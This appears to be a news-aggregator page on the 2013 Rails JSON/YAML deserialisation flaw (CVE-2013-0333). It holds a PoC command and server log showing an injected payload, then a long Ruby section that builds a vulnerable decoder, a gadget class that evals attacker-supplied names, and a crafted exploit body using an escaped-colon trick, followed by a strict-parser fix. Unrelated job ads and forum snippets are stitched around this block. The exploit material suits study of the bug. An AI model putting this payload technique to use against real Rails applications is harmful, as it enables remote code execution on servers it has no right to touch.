29 Jan '13, 6am

Rails PoC exploit for CVE-2013-0333. #rails

$ rails_omakase http://localhost:3000/secrets "puts 'lol'"
lol

Started POST "/secrets" for 127.0.0.1 at 2013-01-28 18:53:18 -0800
Processing by SecretsController#show as
  Parameters: {"_json"=>#<ActionDispatch::Routing::RouteSet::NamedRouteCollection:0x00000002221080 @routes={:"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n"=>#<struct defaults={:action=>"create", :controller=>"foos"}, required_parts=[], requirements={:action=>"create", :controller=>"foos"}, segment_keys=[:format]>}, @helpers=[:"hash_for_foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_url", :"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_url", :"hash_for_foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_path", :"foo\nend\n(puts 'lol'; @executed = true) unless @executed\n__END__\n_path"], @module=#<Module:0x00000002220fb8>>}
...

Full article: http://ronin-ruby.github.com/blog/2013/01/28/new-rails-po...
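The log above shows the shape of the attack: the request body was YAML rather than JSON, the YAML tag named NamedRouteCollection, and the "_json" key means the decoded object was not a Hash and got wrapped by the params parser. What follows is an added example, not the ronin tool and not Rails' own source: a cut-down stand-in for the Rails 3.0/2.3 YAML-based JSON backend (JSON text nudged into YAML syntax and handed to the YAML loader), a toy gadget class RouteHelpers playing the part of NamedRouteCollection (its fired recorder, routes method and helper template are assumptions; the pattern of interpolating the route name into eval'd source is the real one), a constructed payload exploit_body, and a strict JSON.parse-based decoder standing in for the fix. One detail a practitioner needs: the converter inserts a space after every unquoted colon, which would break a tag like !ruby/hash:Klass, but a colon written as \u003a passes the first pass untouched and is decoded into a real colon by the second.

```ruby
require 'json'
require 'yaml'
require 'strscan'

# Stand-in for the gadget instantiated in the log above (NamedRouteCollection).
# The class, its `fired` recorder and the helper template are assumptions; the
# pattern is the real one: []= interpolates the route name into Ruby source and
# evals it, so a name containing newlines can close the def, run code, and
# discard the rest of the template with __END__.
class RouteHelpers
  @fired = []                                   # records attacker code that ran (assumed helper)
  class << self
    attr_reader :fired
  end

  def []=(name, route)
    # VULNERABLE: `name` is attacker-controlled source text.
    self.class.class_eval("def #{name}_url\n  #{route.inspect}\nend\n")
    (@routes ||= {})[name] = route              # allocate() skipped initialize
  end

  def routes
    @routes || {}
  end
end

# Simplified stand-in for Rails 3.0's YAML JSON backend (date handling omitted).
module YamlBackedJSON
  # Pass 1 puts a space after every colon and comma outside quotes, turning
  # {"a":1,"b":2} into the YAML flow mapping {"a": 1, "b": 2}.
  # Pass 2 decodes JSON \uXXXX and \/ escapes. That order is the weakness a
  # payload exploits: a colon written as \u003a is invisible to pass 1 and
  # becomes a real colon in pass 2, so !ruby/hash:Klass reaches YAML intact.
  def self.convert_json_to_yaml(json)
    s = StringScanner.new(json)
    quoting = nil
    out = +''
    until s.eos?
      ch = s.getch
      case ch
      when '\\'
        out << ch << s.getch.to_s               # keep escape pairs verbatim
      when '"', "'"
        quoting = (quoting == ch ? nil : (quoting || ch))
        out << ch
      when ':', ','
        out << ch
        out << ' ' unless quoting
      else
        out << ch
      end
    end
    out.gsub(/\\(u\h{4}|\/)/) { $1 == '/' ? '/' : [$1[1..-1].to_i(16)].pack('U') }
  end

  def self.decode(body)
    yaml = convert_json_to_yaml(body)
    # Rails 3.0 called YAML.load; Psych 4+ made that a safe load, so use the
    # unsafe loader where it exists to reproduce the 2013 behaviour.
    YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(yaml) : YAML.load(yaml)
  end

  # ParamsParser behaviour: a decoded body that is not a Hash is stored under
  # "_json", which is why the log shows "_json"=>#<...NamedRouteCollection ...>.
  def self.params_for(body)
    data = decode(body)
    data.is_a?(Hash) ? data : { '_json' => data }
  end
end

# Fixed behaviour: a real JSON parser. YAML tags are not JSON, so the body is
# rejected instead of deserialised.
module StrictJSON
  def self.decode(body)
    JSON.parse(body)
  end

  def self.rejects?(body)
    decode(body)
    false
  rescue JSON::ParserError
    true
  end
end

# Constructed attack body (YAML sent with Content-Type: application/json).
# Only the colon inside the tag needs the \u003a spelling; the mapping colon
# after the key is supposed to get a space anyway.
def exploit_body
  # Single-quoted so \n stays literal; the YAML loader turns it into newlines.
  key = 'foo\nend\nRouteHelpers.fired << :yaml_backend\n__END__\n'
  "--- !ruby/hash\\u003aRouteHelpers\n\"#{key}\": /foos\n"
end

if __FILE__ == $PROGRAM_NAME
  benign = '{"a":1,"b":[2,3]}'
  p YamlBackedJSON.decode(benign)              # same hash as JSON.parse: bug invisible on honest input
  p StrictJSON.decode(benign)
  p YamlBackedJSON.params_for(exploit_body)    # {"_json"=>#<RouteHelpers ...>}
  p RouteHelpers.fired                         # includes :yaml_backend
  p StrictJSON.rejects?(exploit_body)          # true
end
```

On ordinary input the YAML-backed decoder returns exactly what JSON.parse returns, which is why the backend looked correct in normal use. On the payload, YAML allocates RouteHelpers and feeds the key through []=, whose class_eval runs the attacker's line; everything after __END__ in the evaluated template is dropped by Ruby's parser, which is how the payload survives whatever the helper template appends after the route name. The strict parser raises JSON::ParserError at the first "-".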

Tweets

Another critical hole in Ruby on Rails closed...

heise.de 29 Jan '13, 1pm

The Ruby development team has closed a very critical hole in the web framework Ruby on Rails (RoR), through which an ...

[remote] - Ruby on Rails JSON Processor YAML De...

exploit-db.com 29 Jan '13, 3pm

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Ple...

Some Versions of Ruby on Rails Vulnerable to Ne...

threatpost.com 29 Jan '13, 6pm

A vulnerability exists in Ruby on Rails’ JavaScript Object Notation (JSON) code that could open the Web framework up to a ...

Vulnerability in the JSON parsing of Ruby on Rails

jvn.jp 29 Jan '13, 3am

Ruby on Rails [SEC][ANN] Rails 3.0.20, and 2.3.16 have been released! Vulnerability in JSON Parser in Ruby on Rails 3.0 an...

Serious vulnerability in "Ruby on Rails" - second update this month: 2013/01/28

security-next.com 29 Jan '13, 6am

Serious vulnerability in "Ruby on Rails" - second update this month. A serious vulnerability has been found in "Ruby on Rails" and an update has been released. Care is needed, since its content differs from the update released on January 8. In this software...

Do you know how to setup Paypal Payflow in Rails?

rubyflow.com 30 Jan '13, 12am

Do you know how to setup Paypal Payflow in Rails? Posted by IndianGuru on January 29, 2013 — 0 comments Learn how to setup...

#Ruby #On #Rails Rails: How do you access the v...

rqna.net 26 Jan '13, 10pm

I'm trying to access the value that a user chooses by manipulating the jQuery Mobile slider. For example, I have a slider ...

#UK [contract] Ruby on Rails Developer - Contra...

contractjob.net 27 Jan '13, 10am

Ruby on Rails Developer - Contract - London. I currently have an opening for a talented Ruby on Rails Developer to join my...

Your Net Works, Inc.: Ruby Rails Developer: Loc...

jobs.37signals.com 29 Jan '13, 3am

A San Francisco based social media company is looking for a Ruby on Rails Developer for a full time contract for an online...

AppAcademy (Ruby on Rails) bootcamp & landing j...

reddit.com 28 Jan '13, 3am

I was really excited to find this morning that I had been accepted into the May class of http://www.appacademy.io/ ! But I...

the best source for information on rails plural...

slash7.com 26 Jan '13, 6pm

Posted on November 17, 2005, 7:32 am, by Amy Hoy, under Home , articles , rails , tips and tricks . Into JavaScript? Have ...

Ruby on Rails Study Guide: The History of Rails

heydesigner.com 23 Jan '13, 7pm

Sublime SFTP – an FTP, FTPS & SFTP Package for Sublime Text 2 posted by wbond.net Spend less time managing file transfers ...

New Job Alert: Ruby on Rails Developer at Strat...

simplyhired.com 27 Jan '13, 1am

Ruby on Rails Developer New York City (Mid-town) Permanent, Direct hire position COMPANY PROFILE: Multi-billion dollar med...